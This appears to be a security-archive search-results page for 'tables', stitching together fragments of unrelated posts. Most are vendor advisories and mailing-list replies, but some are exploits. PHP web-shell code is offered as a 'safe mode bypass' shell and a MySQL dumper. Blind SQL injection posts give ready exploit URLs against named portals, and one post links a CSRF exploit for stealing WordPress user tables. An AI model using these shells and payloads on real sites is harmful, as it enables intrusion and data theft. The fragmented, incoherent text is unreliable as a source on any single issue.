
tables

New bypass shell for linux

Msn : erne@ernealizm.us


Shell : 

<html><head><title>*  ernealizm  * </title><body bgcolor="#000000"><table Width='100%' height='10%' bgcolor='#000000' border='1'>
<tr><td><center><font size="4" color="#FFFFFF"><span style="background-color: #000000">ErNe Safe Mode Bypass For BiyoSecurity.Net</span>
</font></center></td></tr></table>
<style type="text/css">
body,td {
        font-family: "Tahoma";

Binn SBuilder (nid) Remote Blind Sql Injection Vulnerability

[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "Powered by CMS.GE"
[~] Dork2: priv8!

[+] Important tables and columns:

[*] Tables:

[~] Table: binn_users


New Shell For Linux & Windows

//@mysql_query('SET NAMES cp1251'); // uncomment if you have problems with character encoding
$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=isset($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
ob_start();

n.runs-SA-2011.004 - web programming languages and platforms - DoS through hash table

                    ASP.NET
                    Python
                    Plone
                    CRuby 1.8, JRuby, Rubinius 
                    v8
Vulnerability:      Denial of Service through hash table
                    multi-collisions
Tracking IDs:       oCERT-2011-003
                    CERT VU#903934
________________________________________________________________________
Vendor communication:

VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issues in third party components

    JRE 1.5.0_20: CVE-2009-2625, CVE-2009-2670, CVE-2009-2671,
    CVE-2009-2672, CVE-2009-2673, CVE-2009-2675, CVE-2009-2676,
    CVE-2009-2716, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720,
    CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================

VMSA-2010-0004 ESX Service Console and vMA third party updates

    application using the newt library.

    The Common Vulnerabilities and Exposures Project (cve.mitre.org)
    has assigned the name CVE-2009-2905 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================

VMSA-2011-0003 Third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,
    CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL
    Express Service Pack 3.

    Column 4 of the following table lists the action required to
    remediate the vulnerability in each release, if a solution is
    available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch

[PRE-SA-2011-01] Multiple Linux kernel vulnerabilities in partition handling code of LDM and MAC partition tables

## Summary ##

Timo Warns (PRESENSE Technologies GmbH) reported some vulnerabilities in
the Linux kernel that may lead to privilege escalation,
denial-of-service, or information leakage via corrupted partition
tables. Exploiting these vulnerabilities has been demonstrated by a "USB
Stick of Death" that crashes the Linux kernel upon connecting the stick.

The kernel automatically evaluates partition tables of storage devices.
Note that this happens independently of whether auto-mounting is enabled
or not. The code for evaluating MAC and LDM partition tables contains the

BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability

[~] True: http://localhost/[path]/template_permalink.asp?id=78 and 1=1
[~] False: http://localhost/[path]/template_permalink.asp?id=78 and 1=2

[+] Exploiting:

[*] Checking table: 

[~] Exploit: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/template_permalink.asp?id=78 AND (SELECT Count(*) FROM tblauthor) >= 0
[~] Example2: http://localhost/[path]/template_permalink.asp?id=78 and exists (select * from tblauthor)

Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection

[~] True: http://localhost/[path]/[any module]?id=1 and 1=1
[~] False: http://localhost/[path]/[any module]?id=1 and 1=2

[+] Exploiting:

[*] Checking table: 

[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0
[~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE])
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0
[~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users)

Re: Guidance Software response to iSEC report on EnCase (fwd)

Of course you do, I can't blame you or your company. But let's be serious
here for a moment, wishing that you're the queen of England doesn't make
it so.


> Forensic examiners will inevitably come across corrupted data on target systems from time to time; and in standard computer forensics training, including classes offered by Guidance Software, examiners are trained to account for such issues. In addition, while Guidance Software maintains a robust in-house quality assurance process and strives to make our software as stable as possible, no software is completely crash-proof and there will always be anomalies, particularly involving extreme scenarios of corrupted target data.

Did you really just turn the shoddiness of your application into a
training opportunity?



[ MDVSA-2010:222 ] mysql

 Problem Description:

 Multiple vulnerabilities were discovered and corrected in mysql:
 
 * Joins involving a table with a unique SET column could cause
 a server crash (CVE-2010-3677).
 
 * Use of TEMPORARY InnoDB tables with nullable columns could cause
 a server crash (CVE-2010-3680).
 

[SECURITY] [DSA 2264-1] linux-2.6 security update

    users could learn the text location of a process, defeating protections
    provided by address space layout randomization (ASLR).

CVE-2011-1010

    Timo Warns reported an issue in the Linux support for Mac partition tables.
    Local users with physical access could cause a denial of service (panic)
    by adding a storage device with a malicious map_count value.
    
CVE-2011-1012


[SECURITY] [DSA 2057-1] New mysql-dfsg-5.0 packages fix several vulnerabilities

CVE-2010-1626

MySQL allows local users to delete the data and index files of another
user's MyISAM table via a symlink attack in conjunction with the DROP
TABLE command.


CVE-2010-1848


RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit

    else if ( empty($_POST['message']) ) {
    redirect_header("javascript:history.go(-1)", 2, _MD_ERRORMESSAGE);
    exit();
    }
    else {
    $sql = "SELECT * FROM ".$bbTable['forums']." WHERE forum_id = ".$_POST['forum'].""; // <-------- !!!
    if (!$result = $db->query($sql)) {
    redirect_header("index.php", 2, _MD_CANTGETFORUM);
    exit();
    }
    ...

VMSA-2010-0009 ESXi ntp and ESX Service Console third party updates

    has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,
    CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,
    CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to
    the security issues fixed in kernel 2.6.18-164.11.1.

    Column 4 of the following table lists the action required to
    remediate the vulnerability in each release, if a solution is
    available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch

glFusion <= 1.1.2 COM_applyFilter()/cookies remote blind sql injection exploit

     
    see SESS_updateSessionTime() function near lines 418-436:
     
    ...
    function SESS_updateSessionTime($sessid, $md5_based=0) {
    global $_TABLES;
     
    $newtime = (string) time();
     
    if ($md5_based == 1) {
     

VMSA-2010-0007 VMware hosted products, vCenter Server and ESX patches resolve multiple security issues

     - Manually upgrade tools in the virtual machine (virtual machine
       users will not be prompted to upgrade).  Note the VI Client will
       not show that VMware Tools is out of date in the summary tab.
       Please see http://tinyurl.com/27mpjo page 80 for details.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available. See above for remediation
    details.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch

glFusion <= 1.1.2 COM_applyFilter()/order sql injection exploit

          And e.g. the alternative syntax SUBSTR(str FROM n FOR n) instead of
        SUBSTR(str,n,n) in a sub-SELECT statement.
          Other attacks are possible; COM_applyFilter() is a very commonly used one.
        
          Additional notes: the 'direction' argument is uppercased by strtoupper().
          You know that table identifiers are case sensitive on Unix-like systems
          but not on MS Windows; however, I chose to inject into the 'order' one
        for better results.
          Vars come from the $_REQUEST[] array, so you can pass them via $_POST[] or
          $_COOKIE[], which is not intended, I suppose.
          

Cisco Security Advisory: SNMP Version 3 Authentication Vulnerabilities

hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the

[Exploit] Invision Power Board <= 2.3.5 Multiple Vulnerabilities

        function set_sql_param()
        {
                $this->p_url   = $this->get_p('url', true);
                $this->p_pre   = $this->get_p('prefix');
                
                # Table prefix
                if( !$this->p_pre )
                {
                        # Default table prefix if not specified
                        $this->msg('Using default table prefix: ibf_', 1);
                        $this->p_pre = 'ibf_';

RainbowCrack 1.4 is released - The Time-Memory Tradeoff Hash Cracker

RainbowCrack is a general purpose implementation of Philippe Oechslin's faster time-memory trade-off technique. It cracks hashes with rainbow tables.

Version 1.4 of the RainbowCrack software is now available for download.

New features:
- New compact rainbow table file format (.rtc) reduces rainbow table size by 50% to 56.25%
- New rt2rtc utility converts rainbow tables from the raw file format (.rt) to the compact file format (.rtc)
- New rtc2rt utility converts rainbow tables from the compact file format (.rtc) to the raw file format (.rt)
- The rcrack/rcrack_cuda programs support both the .rt and .rtc rainbow table file formats
- Conversion from non-perfect to perfect rainbow tables is supported by the rt2rtc utility

Geeklog <=1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit

    now WS_authenticate() function in /system/lib-webservices.php near lines 780-877:

    ...
    function WS_authenticate()
    {
    global $_CONF, $_TABLES, $_USER, $_GROUPS, $_RIGHTS, $WS_VERBOSE;

    $uid = '';
    $username = '';
    $password = '';


Re: OpenID/Debian PRNG/DNS Cache poisoning advisory

| > You can get by with a lot less than 64 bits.  People see problems
| > like this and immediately think "birthday paradox", but there is no
| > "birthday paradox" here:  You aren't looking for pairs in an
| > ever-growing set, you're looking for matches against a fixed set.
| > If you use 30-bit hashes - giving you about a 120KB table - the
| > chance that any given key happens to hash to something in the table
| > is one in a billion, now and forever.  (Of course, if you use a
| > given key repeatedly, and it happens to be that 1 in a billion, it
| > will hit every time.  So an additional table of "known good keys
| > that happen to collide" is worth maintaining.  Even if you somehow

VMSA-2009-0005 VMware Hosted products, VI Client and patches for ESX and ESXi resolve multiple security issues

    Defense for reporting this issue.

    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2008-4916 to this issue.

    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================

[Suspected Spam]CSRF, Information Leakage and Full path disclosure vulnerabilities in WordPress

get the backup of site's DB via earlier mentioned Information Leakage
vulnerability, or for the purpose of creating of large number of backup
files, to occupy free space at the server. Or in order to receive backup on
email. These CSRF-attacks are possible if plugin WP-DB-Backup is activated.

With the help of a CSRF attack it's possible to make a backup of any tables,
either all of them or selectively (e.g. the table with users, wp_users). In this
exploit the backup is made of the table wp_users:

http://websecurity.com.ua/uploads/2010/WordPress%20Database%20Backup%20CSRF.html


Re[2]: Apache web server 2.2: htpasswd predictable salt weakness

PW> providing reasonably good entropy sources, there's little reason not to
PW> "do it right". It's not the worst mistake I've seen, by far not the most
PW> dangerous. But it's sloppy of the Apache Group to have ignored it for half
PW> a decade.

It's quite easy. Precomputing a rainbow table for MD5 crypt with a known
salt is somewhat equivalent to MD5 crypt brute-forcing, if you don't mind
the required amount of storage. So a predictable salt and narrowed salt
space will have some impact if the salt changes in a time comparable with
the time required for brute-forcing. A salt changing once a second is a
really good one, because brute-forcing takes much longer.

VMSA-2012-0001 VMware ESXi and ESX updates to third party library and ESX Service Console

    CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,
    CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525,
    CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495,
    CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 to these issues.

    Column 4 of the following table lists the action required to
    remediate the vulnerability in each release, if a solution is
    available.

    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch

[USN-950-1] MySQL vulnerabilities

intended restrictions. This issue only affected Ubuntu 9.10 and 10.04 LTS.
(CVE-2010-1621)

It was discovered that MySQL could be made to delete another user's data
and index files. An authenticated user could use symlinks combined with the
DROP TABLE command to possibly bypass privilege checks. (CVE-2010-1626)

It was discovered that MySQL incorrectly validated the table name argument
of the COM_FIELD_LIST command. An authenticated user could use a specially-
crafted table name to bypass privilege checks and possibly access other
tables. (CVE-2010-1848)

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.